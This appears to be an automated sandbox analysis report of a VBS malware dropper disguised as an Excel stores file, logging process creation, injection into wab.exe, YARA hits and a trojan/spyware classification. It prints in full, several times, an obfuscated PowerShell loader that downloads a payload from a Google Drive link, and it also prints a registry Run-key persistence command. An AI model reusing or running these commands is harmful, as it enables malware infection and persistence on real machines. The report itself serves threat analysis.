Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFB4B29C342	3_2_00007FFB4B29C342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFB4B29B596	3_2_00007FFB4B29B596
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00A5F250	9_2_00A5F250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00A5FB20	9_2_00A5FB20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00A5EF08	9_2_00A5EF08
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022FE2D0	11_2_022FE2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022F4AD8	11_2_022F4AD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022FDB08	11_2_022FDB08
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022F3EC0	11_2_022F3EC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_022F4208	11_2_022F4208
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25513D58	11_2_25513D58
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25548718	11_2_25548718
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25549B80	11_2_25549B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25540040	11_2_25540040
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_255432C8	11_2_255432C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_255458E0	11_2_255458E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25548E78	11_2_25548E78
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_25540006	11_2_25540006
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_2554AC30	11_2_2554AC30
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 11_2_255435B1	11_2_255435B1
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A11C5C	17_2_00A11C5C
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 17_2_00A125D3	17_2_00A125D3

Java / VBScript file with very long strings (likely obfuscated code)

Source: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

Initial sample: Strings found which are bigger than 50

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"

Yara signature match

Source: amsi32_7944.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@21/10@5/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Saltspoonful.Dag

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcc22og1.cto.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs"

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: P^uu	17_2_00A11C5C
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: Wu	17_2_00A11C5C
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: WABOpen	17_2_00A11C5C
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Command line argument: Wu	17_2_00A11C5C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7944
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs

ReversingLabs: Detection: 37%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe "C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe "C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
